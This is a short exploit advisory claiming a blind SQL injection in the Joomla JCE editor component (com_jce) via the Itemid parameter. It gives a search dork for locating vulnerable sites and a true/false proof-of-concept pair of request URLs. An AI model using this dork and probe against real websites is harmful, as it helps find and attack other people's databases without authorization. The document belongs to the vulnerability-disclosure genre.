44 lines
No EOL
1.5 KiB
Text
44 lines
No EOL
1.5 KiB
Text
===================================================================
|
|
joomlacontenteditor (com_jce) BLIND sql injection vulnerability
|
|
===================================================================
|
|
|
|
Software: joomlacontenteditor (com_jce)
|
|
Vendor: www.joomlacontenteditor.net
|
|
Vuln Type: BLind SQL Injection
|
|
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
|
|
Author: eidelweiss
|
|
contact: eidelweiss[at]windowslive[dot]com
|
|
Home: www.eidelweiss.info
|
|
Dork: inurl:"/index.php?option=com_jce"
|
|
|
|
|
|
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
|
|
|
|
|
|
===================================================================
|
|
|
|
Description:
|
|
|
|
JCE makes creating and editing Joomla!®
|
|
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
|
|
without limitations, and without needing to know or learn HTML, XHTML, CSS...
|
|
|
|
===================================================================
|
|
|
|
exploit & p0c
|
|
|
|
[!] index.php?option=com_jce&Itemid=[valid Itemid]
|
|
|
|
Example p0c
|
|
|
|
[!] http://host/index.php?option=com_jce&Itemid=8 <= True
|
|
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False
|
|
|
|
|
|
====================================================================
|
|
|
|
Nothing Impossible In This World Even Nobody`s Perfect
|
|
|
|
===================================================================
|
|
|
|
==========================| -=[ E0F ]=- |========================== |